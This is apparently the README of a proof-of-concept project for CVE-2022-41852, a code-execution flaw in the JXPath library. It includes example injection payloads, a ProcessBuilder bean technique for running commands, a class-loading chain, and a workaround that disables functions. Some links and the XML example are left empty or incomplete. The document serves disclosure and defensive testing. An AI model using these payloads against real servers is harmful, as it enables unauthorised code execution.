# Remote Code Execution in JXPath Library (CVE-2022-41852) Proof of Concept

CVE-2022-41852 allows attackers to execute code on the application server.

You can read more about this vulnerability here:

<i><b>Note:</b> I am not an author of this CVE. I have only created this proof of concept.</i>

## Useful Links
- [JXPath GitHub](
- [JXPath Website](
- [MITRE CVE-2022-41852](
- [NIST CVE-2022-41852](

## Vulnerability Description
JXPath library has support for running functions in XPath expressions 
(see [Official User Guide](

For example, methods `JXPathContext.getValue(path)` and `JXPathContext.iterate(path)` are dangerous 
if you let user send input into the path parameter.

## PoC Description
This PoC starts simple Spring server with two endpoints:

- `/vulnerable-example?path=[path]`
- `/secure-example?path=[path]`

These endpoints have only one query parameter "path". 

### Possible Request URLs
Following requests will work fine (will not cause any problems):
- http://localhost:8080/secure-example?path=name
- http://localhost:8080/secure-example?path=website
- http://localhost:8080/secure-example?path=/
- http://localhost:8080/vulnerable-example?path=name
- http://localhost:8080/vulnerable-example?path=website
- http://localhost:8080/vulnerable-example?path=/

Following requests will cause code to be executed:
- http://localhost:8080/vulnerable-example?path=java.lang.System.exit(42)
- http://localhost:8080/vulnerable-example?path=java.lang.Thread.sleep(10000)

## Example Payloads
Example payloads to detect CVE-2022-41852:
- `java.lang.System.exit(42)`
- `java.lang.Thread.sleep(10000)`
- `/|java.lang.System.exit(42)`
- `|java.lang.System.exit(42)`

There might be various ways to execute commands. One of them is using Spring's ClassPathXmlApplicationContext:
- `"")`

In the XML file, you can define bean configuration, for example, you can create instance of `ProcessBuilder`
and run specified command on the server by initializing the bean using `start()` method. 
In the following example, calculator will be opened on Windows machine:
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="" xmlns:xsi="" xsi:schemaLocation="">
  <bean id="commandRunner" class="java.lang.ProcessBuilder" init-method="start">

There is also a way to load new classes by traversing the context bean, for example, the following code will load class `com.warxim.dangerous.DangerousClass`, create its instance and call method `run("warxim")`:
JXPathContext context = JXPathContext.newContext(new Data());
String jxPath = "run(newInstance(loadClass(getClassLoader(getClass(/)), \"com.warxim.dangerous.DangerousClass\")), \"warxim\")"
Object result = context.getValue(jxPath);
Notice that we have to call the object methods by putting the object that contains them as a first parameter.

## Workaround for CVE-2022-41852

It is possible to disable functions in JXPathContext by setting functions field to empty `FunctionLibrary`.
// Create path context for person object
var pathContext = JXPathContext.newContext(person);

// Set empty function library
pathContext.setFunctions(new FunctionLibrary());

// getValue will throw org.apache.commons.jxpath.JXPathFunctionNotFoundException
return pathContext.getValue(path);
<i><b>Note:</b> It will disable all functions, so even functions like `size()` will not be available.</i>

## Fix
The fix is being developed, see